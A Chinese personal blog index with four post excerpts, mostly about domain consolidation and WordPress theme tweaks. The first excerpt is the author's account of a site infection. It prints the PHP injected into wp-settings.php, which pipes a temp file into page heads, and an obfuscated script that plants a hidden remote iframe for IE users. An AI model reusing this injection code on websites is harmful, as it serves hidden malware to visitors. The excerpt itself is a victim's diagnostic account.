落园专注经济视角下的互联网 / Economic Observation of the Internet

最近两个blog都不消停，总有木马嵌入的报告。是可忍孰不可忍，在今早收到google Webmaster的通知之后，决定彻底的查一下这个感染的原因。 登上FTP，看到wp-settings.php这个文件更新日期和其他的都不一样，就下下他来。然后和标准的安装包自带的wp-settings.php进行比对，果然发现多了这么几行： function check_wordpress(){ $t_d = sys_get_temp_dir(); if(file_exists($t_d . '/wp_inc')){ readfile($t_d . '/wp_inc'); } } add_action('wp_head', 'check_wordpress'); 遂加了一行echo $t_d. '/wp_inc' ;，华丽丽的发现输出了一个/tmp。这个时候访问blog并查看源文件，发现有一行代码被嵌入： eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|hggf|...

查看全文

我这次彻底被惹火了。真的大感慨：早知如此，何必当初！ 落园两个域名、两个服务器分别独立运行的痛苦日子终于要结束了——我也痛下决心，牺牲一部分速度，做出这个抉择——落园国内服务器暂停。接下来的问题就是把.cn的域名做一个301永久重定向，全部指到loyhome.com来。 其实本来是想做一个在MySQL 层面的数据库同步的，但无奈两个服务器之间不给力，同步很难做。wordpress镜像的次选择就是直接在配置文件里面写入远程MySQL服务器地址，但也不是很给力。最后的办法就是全静态同步，自然还是不给力。我实在忍无可忍了，再也不想忍受两个站点手动同步刷新的痛苦，于是决定赶紧的搞定这个事儿。.com转到国内还牵扯一个备案问题，同样是折磨的我实在是受不了的事儿。索性，一了百了，全面转身.com并使用国外的服务器。为了清理这一年来的旧账（两边都有留言），我还写了一天的R代码来一一对应各种文章ID和留言ID，最后终于全面整理了过来。国内的服务器可能还会保留给后花园用。 我不得不唠叨一下这些痛苦的历史。落园从2006年开始运行在独立域名上（落园以前是在blogcn上的，前段时间blogcn删档，落园最早的文章就全部覆灭了，正好，毁尸灭迹，不怕有人追踪什么了），以loyhome.cn作为唯一的域名。后来...

查看全文

刚在才琢磨，已经多久没有改变这几个blog的面目了? 虽然从某种程度上说，这一切都只是表面文章，但是表面文章太久不做，未免让人觉得这家伙有点慵懒。嗯啊，其实我确实是挺慵懒的。最近在写作业不得不做simulation的时候才意识到自己已经多久没有正儿八经的码过代码了……上一次打开notepad++仿佛都是十几年前的事情了，没有感觉也没有记忆了…… 最近发现其实数值模拟也挺好玩的，尤其是为某个变态的公式磨得焦头烂额的时候。恩啊，几行代码可以搞定很多东西，生活会变的稍微简单一点点 ，至少这个世界会清静一点是不是? 原来一直觉得我的R玩得挺差的，只有用到的时候才会临阵抱佛脚看看到底该怎么玩，后来发现佛脚抱多了也是有好处的，虽然比不上人家正经训练的写的代码那般漂亮，思路那般清晰，但是还是可以冲锋陷阵一下下的，糊弄一下人还是足够的%-%前几天写高宏作业的时候老师特别仁慈地说可以不用Matlab，当时就觉得世界解放了一般……恩啊，虽然我的Matlab一瓶子不满却也能半瓶子咣当着，但毕竟不是最舒服的不是。 哎呀呀，一下子又跑题了。本来只是想督促一下自己好好包装一下英文博客的，现在看着跟红白喜事儿似的，太沉寂了。小变化小惊喜还是应该有的，也算是对自己眼睛的犒劳...

查看全文

昨天更新了一下PageNavi这个插件，然后发现新版本自己带了一个CSS，导致我原来在模板中定义的样式失效，这也刺激了我去好好休整一下这个四处透风的Wordpress。 +改回来页面导航的样式 +调整了前台页面的文字，把所有不适应国情的英文字符都改为中文了（分家咯）。现在留下的大概只有RSS, Tag这些不好翻译也不用翻译的个别英文了。 +调整了个别位置英文字体的样式，排除了宋体显示英文。 +调整后台目录，使得wordpress可以实现自动升级（已升级至最新版）。由于支持widgets的话对CSS文件需进行较大调整，所以暂且搁置。 +顺手升级了后花园的TextCube，其实我仍然觉得这个是不错的blog系统，不过可能更适应韩国。 -调整模板，去掉自动将半角符号转换为全角符号的函数（可能仅有中文版有此毛病）。 +更新了表情包，由“洋葱头”换成了“胖兔子粥粥”。由于GIF动画图片不足，又加了一些静态的。。 +修正了评论页的一些错误，主要是被密码保护的文章评论页模板问题。 唯一不爽的就算在中文14PX的显示下，英文字体显得很粗糙（Firefox下，可能是没有cleartype支持的缘故）。正文中的英文只能继续这么忍受着了。

查看全文